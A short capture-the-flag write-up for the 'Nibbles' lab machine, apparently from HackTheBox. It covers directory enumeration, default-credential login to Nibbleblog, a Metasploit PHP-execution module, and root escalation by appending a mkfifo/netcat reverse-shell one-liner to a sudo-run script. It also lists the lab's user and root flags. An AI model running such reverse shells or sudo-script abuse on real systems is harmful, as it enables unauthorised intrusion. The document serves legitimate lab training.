Nibbles -

Target Enumeration:

OS: Linux


User: b02ff32bb332deba49eeaed21152c8d8

Root: b6d745c0dfb6457c55591efc898ef88c

Ports / Services / Software Versions Running

80/tcp open http Apache httpd 2.4.18

Vulnerability Exploited:

Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code.

Exploiting the host:


Visiting Port 80 and viewing the source code gives us the following:

Using dirb against /nibbleblog gives us admin.php which is a login interface.

Testing the usernames and passwords for defaults gives us admin:nibbles

Searching for exploits gives us:

We load metasploit and configure our options as follows:

Run the exploit and get a low privileged user as nibbles:

Running on the host gives us a potential lead.

So we need to unzip within /home/nibbler and modify to get root.

We set up a nc listener on port 2491 locally and we insert the following command into the file:

echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 2491 >/tmp/f” >>

We then execute the file with /usr/bin/sudo to receive our root shell.

And we receive a root shell in return.

Last updated